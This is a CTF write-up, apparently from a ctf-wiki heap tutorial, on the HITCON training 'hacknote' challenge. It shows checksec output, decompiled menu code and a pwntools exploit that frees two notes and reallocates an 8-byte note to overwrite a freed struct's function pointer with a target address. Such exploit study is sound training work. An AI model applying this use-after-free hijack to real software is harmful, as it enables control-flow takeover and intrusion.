目录
hacknote
file checksec
root@ubuntu:/home/giantbranch/Desktop/ctfpwn/ctfwiki/heap/use_after_free/hitcon-training-hacknote# file hacknote
hacknote: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8278e3f039d24b529afdaa536d8093784a7e4033, not stripped
root@ubuntu:/home/giantbranch/Desktop/ctfpwn/ctfwiki/heap/use_after_free/hitcon-training-hacknote# checksec hacknote
[*] '/home/giantbranch/Desktop/ctfpwn/ctfwiki/heap/use_after_free/hitcon-training-hacknote/hacknote'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
ida32查看
/* Print the HackNote menu banner and the "Your choice :" prompt.
 * Returns whatever the final printf() returns (the number of bytes it wrote). */
int menu()
{
    static const char *const banner[] = {
        "----------------------",
        " HackNote ",
        "----------------------",
        " 1. Add note ",
        " 2. Delete note ",
        " 3. Print note ",
        " 4. Exit ",
        "----------------------",
    };
    size_t i;

    for (i = 0; i < sizeof(banner) / sizeof(banner[0]); i++)
        puts(banner[i]);
    /* No newline on purpose: the prompt stays on the same line as the input. */
    return printf("Your choice :");
}
结构体
00000000 note struc ; (sizeof=0x8, mappedto_1)
00000000 put dd ? ; offset
00000004 content dd ? ; offset
00000008 note ends
#!/usr/bin/env python2
from pwn import *
# Target: the 32-bit "hacknote" binary in the working directory.
filename = "hacknote"
arch = "i386"
# Pwntools context; log_level="debug" echoes every byte sent and received.
context(os="linux", arch=arch, log_level="debug")
# Mode switch read by main(): 0 -> spawn the local binary, otherwise remote().
content = 0
# Not referenced anywhere on this page; kept as a module-level name.
offset = 0
# Parsed ELF of the target (symbols/sections); not used further on this page.
elf = ELF(filename)
# No libc is loaded in this script.
def add(i, size, content):
    """Send menu choice 1 ("Add note") followed by the size and the note body.

    ``i`` is never sent to the program; it only mirrors the index taken by
    ``delete``/``p`` at the call sites. ``content`` shadows the module-level
    ``content`` flag inside this function only.
    """
    for line in ('1', str(size), content):
        io.sendline(line)
def delete(index):
    """Send menu choice 2 ("Delete note") and then the slot index."""
    choice = '2'
    io.sendline(choice)
    io.sendline(str(index))
def p(index):
    """Send menu choice 3 ("Print note") and then the slot index."""
    for line in ('3', str(index)):
        io.sendline(line)
def b(addr):
    """Attach gdb to the live process with a single breakpoint at ``addr``.

    ``addr`` goes through ``str()``, so an int breakpoint address is written
    as a decimal literal in the ``b *...`` command.
    """
    breakpoint_cmd = "b *{}".format(addr)
    gdb.attach(io, breakpoint_cmd)
    success("attach")
def main():
    """Drive HackNote through the add / delete / add / print sequence.

    The module-level ``content`` flag selects a local process (0) or a
    ``remote("")`` target; ``io`` is published as a global so the helper
    functions can write to it.
    """
    global io
    io = process("./" + filename) if content == 0 else remote("")

    # Two notes of size 32, then both freed. The write-up's premise (see the
    # use_after_free path above) is that the program keeps using the freed
    # note structs afterwards — presumably; not visible from this script.
    add(0, 32, b'aaaa')
    add(1, 32, b'bbbb')
    delete(0)
    delete(1)

    # Debugger stop at 0x08048A7C (what that address is in the binary is not
    # shown on this page).
    b(0x08048A7C)

    # A size-8 note matches sizeof(note) == 0x8 from the IDA struct, so the
    # new content is expected to land on a freed note struct, with its first
    # field (the `put` pointer) set to magic_addr — confirm under gdb.
    magic_addr = 0x08048986
    add(1, 8, p32(magic_addr))

    # Printing slot 0 then goes through the stale struct, if the reuse above
    # succeeded.
    p(0)
    io.recv()
    io.interactive()
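# Only run the interaction when executed as a script, not when imported.
if __name__ == "__main__":
    main()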